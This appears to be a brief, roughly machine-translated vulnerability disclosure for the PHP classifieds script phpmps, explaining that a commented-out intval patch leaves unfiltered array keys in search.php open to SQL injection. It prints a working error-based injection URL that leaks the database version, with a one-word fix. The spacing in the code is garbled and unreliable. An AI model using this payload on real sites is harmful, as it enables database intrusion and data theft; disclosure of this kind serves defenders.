Injection vulnerability caused by phpmps patch Error
The problem is that the keys in the foreach array are not filtered.
I downloaded the latest version from the official website.
The last update should be the version. Check the patch and you will know that it is being repaired.
$ Data = read_cache ('custom ');
//$cusid = intval($cusid);if($data===false) {
// $ Cusid = intval ($ cusid); this is the fix for the last vulnerability patch.
But why did you comment on him ....
The demo has been reproduced, but I don't know if the latest version of the demo is used to build a local reproduction.
Http: // 127.0.0.1/phpmps/search. php
? Custom [xss ') AND (SELECT 8734 FROM (select count (*), CONCAT (@ version, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x) a) #] = 1
Return information. version information is obtained successfully.
Solution:
Filter